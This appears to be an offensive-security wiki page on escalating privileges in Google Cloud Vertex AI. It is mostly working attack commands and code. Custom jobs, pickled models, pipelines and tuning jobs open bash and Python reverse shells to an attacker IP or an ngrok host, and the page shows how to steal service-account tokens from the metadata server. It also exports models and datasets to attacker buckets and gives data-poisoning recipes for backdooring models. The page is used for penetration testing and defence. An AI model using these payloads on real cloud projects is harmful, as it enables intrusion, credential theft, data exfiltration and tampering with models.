# GCP - Vertex AI Privesc


## Vertex AI

For more information about Vertex AI check:

GCP - Vertex AI Enum

For Agent Engine / Reasoning Engine post-exploitation paths that abuse the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting to consumer / producer / tenant resources, check:

GCP - Vertex AI Post Exploitation

### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`

With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can run arbitrary code with elevated privileges.

This is done by creating a custom training job that runs attacker-controlled code (either a custom container or a Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, allowing extraction of the service account's OAuth access token.

**Impact**: Full privilege escalation to the target service account's permissions.
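Before creating a job, you can check whether your principal actually holds both permissions; a minimal sketch using the Resource Manager `testIamPermissions` API (the project ID is a placeholder):

```bash
# Returns only the subset of the queried permissions that you actually hold
curl -s -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://cloudresourcemanager.googleapis.com/v1/projects/<project-id>:testIamPermissions" \
-d '{"permissions": ["aiplatform.customJobs.create", "iam.serviceAccounts.actAs"]}'
```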

<details>

<summary>Create a custom job with reverse shell</summary>
```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=revshell-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```

</details>
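With the exfiltrated token you can act as the service account from your own machine; a short sketch (which APIs work depends on the stolen account's roles):

```bash
TOKEN="<stolen-access-token>"
# Inspect the token (expiry, scopes, principal)
curl -s "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=${TOKEN}"
# Example use: list GCS buckets in the project with the stolen identity
curl -s -H "Authorization: Bearer ${TOKEN}" \
"https://storage.googleapis.com/storage/v1/b?project=<project-id>"
```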

<details>

<summary>Alternative: Extract token from logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
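
# If you don't know the job ID, you can list recent custom jobs first
# (assumed helper step, requires aiplatform.customJobs.list):
gcloud ai custom-jobs list --region=<region>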

```

</details>

### `aiplatform.models.upload`, `aiplatform.models.get`

This technique achieves privilege escalation by uploading a model to Vertex AI and then abusing it to execute code with elevated privileges via an endpoint deployment or a batch prediction job.

> [!NOTE]
> To perform this attack you need a publicly readable GCS bucket, or you can create a new one to upload the model artifacts.
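If you need to stage a bucket yourself, a minimal sketch (bucket name, region and project are placeholders):

```bash
# Create a bucket you control for the model artifacts
gsutil mb -l us-central1 -p <project-id> gs://<your-bucket>
# Optionally make objects publicly readable so the model loader can fetch them
gsutil iam ch allUsers:objectViewer gs://<your-bucket>
```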

<details>

<summary>Upload malicious pickled model with reverse shell</summary>
```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/malicious-model/ \
--display-name=malicious-sklearn \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```

</details>
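Because the payload lives in `__reduce__`, simply unpickling the artifact executes it; you can sanity-check the trigger locally (with a harmless command substituted for the shell) before uploading. A sketch:

```bash
# Loading the pickle is enough to run the payload - no prediction call needed
python3 -c 'import pickle; pickle.load(open("model.pkl", "rb"))'
```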

<details>

<summary>Upload model with reverse shell container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c 'import pickle; pickle.dump({}, open("model.pkl", "wb"))'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

```

</details>

> [!DANGER]
> After uploading the malicious model, an attacker could wait for someone to use it, or trigger it himself via an endpoint deployment or a batch prediction job.

### `iam.serviceAccounts.actAs`, (`aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`) or (`aiplatform.endpoints.setIamPolicy`)

If you have permissions to create and deploy models to endpoints, or to modify endpoint IAM policies, you can abuse malicious models uploaded in the project to escalate privileges. To trigger one of the previously uploaded malicious models, all you need to do is deploy it to an endpoint with a privileged service account (see below).
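For the `aiplatform.endpoints.setIamPolicy` variant, you could first grant yourself the missing endpoint permissions; a hedged sketch via the Vertex AI `endpoints.setIamPolicy` REST method (the role and member chosen here are assumptions):

```bash
# Grant yourself a privileged role on an existing endpoint (member/role are examples)
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://<region>-aiplatform.googleapis.com/v1/projects/<project-id>/locations/<region>/endpoints/<endpoint-id>:setIamPolicy" \
-d '{"policy": {"bindings": [{"role": "roles/aiplatform.admin", "members": ["user:<attacker-email>"]}]}}'
```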

<details>

<summary>Deploy the malicious model to an endpoint</summary>
```bash
# Create an endpoint
gcloud ai endpoints create \
--region=<region> \
--display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
--region=<region> \
--model=<model-id> \
--display-name=revshell-deployment \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
--machine-type=n1-standard-2 \
--min-replica-count=1
```

</details>
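If the malicious container only runs its payload at inference time rather than at load time, a prediction request against the deployed endpoint should trigger it; a minimal sketch (the request body is arbitrary dummy data):

```bash
# Send a dummy prediction request to the deployed model
echo '{"instances": [[1.0, 2.0]]}' > request.json
gcloud ai endpoints predict <endpoint-id> \
--region=<region> \
--json-request=request.json
```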


### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

If you have permissions to create **batch prediction jobs** and run them with a service account, you can access the metadata service. The malicious code is executed by a **custom prediction container** or a **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created via the REST API or the Python SDK (no gcloud CLI support).

> [!NOTE]
> This attack first requires uploading a malicious model (see the `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.

<details>

<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
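
# (Assumed follow-up, not in the original) Poll the job state via the REST list call:
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs"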

```

</details>

### `aiplatform.models.export`

If you have the `aiplatform.models.export` permission, you can export model artifacts to a GCS bucket you control, potentially gaining access to sensitive training data or model files.

> [!NOTE]
> To perform this attack you need a GCS bucket readable and writable by anyone, or you can create a new one to receive the exported model artifacts.
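To locate a target model ID first (assuming you also hold `aiplatform.models.list`; a sketch):

```bash
# List models in the project to pick a MODEL_ID for the export below
gcloud ai models list --region=<region> --project=<project-id>
```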

<details>

<summary>Export model artifacts to a GCS bucket</summary>
```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
-d '{
"outputConfig": {
"exportFormatId": "custom-trained",
"artifactDestination": {
"outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
}
}
}'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Create **ML pipeline jobs** that run multiple steps with arbitrary containers and escalate privileges via reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks where each component can use different containers and configurations.

> [!NOTE]
> You need a GCS bucket writable by anyone to use as the pipeline root.

<details>

<summary>Install Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
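
# The submission script below also uses the 'requests' HTTP library
pip install requests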
```

</details>

<details>

<summary>Create a pipeline job with reverse shell container</summary>
```python
#!/usr/bin/env python3
import json
import subprocess

import requests

PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<target-sa>"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print("  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")
```

</details>

### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or an exfiltration command, and attaching a privileged service account, you can escalate privileges.

**Impact**: Full privilege escalation to the target service account's permissions.

<details>

<summary>Create hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
  - metricId: accuracy
    goal: MAXIMIZE
  parameters:
  - parameterId: learning_rate
    doubleValueSpec:
      minValue: 0.001
      maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
  - machineSpec:
      machineType: n1-standard-4
    replicaCount: 1
    containerSpec:
      imageUri: python:3.11-slim
      command: ["python3"]
      args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
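
# (Assumed follow-up, not in the original) Monitor trial status; each running trial
# executes the malicious container and yields a fresh callback:
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>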

```

</details>

### `aiplatform.datasets.export`

Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data, which may include PII, confidential business data, or other sensitive information used to train production models.

<details>

<summary>Export dataset to exfiltrate training data</summary>
```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
-d '{
"exportConfig": {
"gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
}
}'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
```

The exported data may contain:

- References to training images/files in GCS buckets

- Dataset annotations and labels

- PII (Personally Identifiable Information)

- Sensitive business data

- Internal documents or communications

- Credentials or API keys in text data

</details>
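A quick way to triage the exported JSONL for obviously sensitive strings (illustrative patterns only, not exhaustive):

```bash
# Grep the export for common secret-looking keywords
grep -rEio '(api[_-]?key|secret|password|token)[^"]{0,40}' ./exported-data/ | head -n 20
```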


### `aiplatform.datasets.import`

Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

By importing manipulated data into a dataset used to train ML models, an attacker can:
- Introduce backdoors into models (trigger-based misclassification)
- Poison training data to degrade model performance
- Inject data that makes models leak information
- Manipulate model behavior for specific inputs

This attack is particularly effective when targeting datasets used for:
- Image classification (inject mislabeled images)
- Text classification (inject biased or malicious text)
- Object detection (manipulate bounding boxes)
- Recommendation systems (inject fake preferences)

<details>

<summary>Import poisoned data into the dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import

```

</details>

**Attack Scenarios:**

<details>

<summary>Backdoor attack - Image classification</summary>
```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```

</details>
<details>

<summary>Label flipping attack</summary>
```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```

</details>
<details>

<summary>Data poisoning for model extraction</summary>
```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```

</details>
<details>

<summary>Targeted attack on specific entities</summary>
```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```

</details>

> [!DANGER]
> Data poisoning attacks can have severe consequences:
>
> - Security systems: evade facial recognition or anomaly detection
> - Fraud detection: train models to ignore specific fraud patterns
> - Content moderation: get harmful content classified as safe
> - Medical AI: misclassify critical health conditions
> - Autonomous systems: manipulate object detection for safety-critical decisions

**Impact**:

- Backdoored models that misclassify on specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models retrained on poisoned data inherit the backdoor)

### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`

> [!WARNING]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of the Vertex AI Workbench Managed Notebooks deprecation. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). It schedules notebook executions on Vertex AI's custom training infrastructure with a specified service account and is essentially a convenience wrapper around `customJobs.create`.
>
> For privilege escalation via notebooks, prefer the `aiplatform.customJobs.create` method documented above: it is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor. The technique below is kept for historical context only and is not recommended for use in new assessments.

Create notebook execution jobs that run Jupyter notebooks with arbitrary code.

Notebook jobs are well suited for interactive-style code execution with a service account, since they support Python code cells and shell commands.

<details>

<summary>Create a malicious notebook file</summary>
```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```

</details>

<details>

<summary>Execute the notebook with the target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"


curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
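
# (Assumed follow-up, not in the original) Pull the executed notebook from the output
# bucket and look for the printed token in its cell outputs:
gsutil ls -r gs://deleteme20u9843rhfioue/output/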

```

</details>
